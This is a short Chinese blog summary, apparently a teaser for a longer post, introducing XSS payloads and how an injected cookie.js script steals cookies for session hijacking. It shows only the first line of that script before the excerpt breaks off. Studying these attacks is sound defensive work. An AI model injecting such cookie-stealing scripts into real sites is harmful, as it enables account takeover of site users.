摘要： xss payload可以使用富客户端文本书写，大多数用javascript，少部分用actionscript等等。1.盗取cookie，发起cookie劫持使用xss漏洞插入cookie.jscookie.js代码：1var img = document.createElement("img");... 阅读全文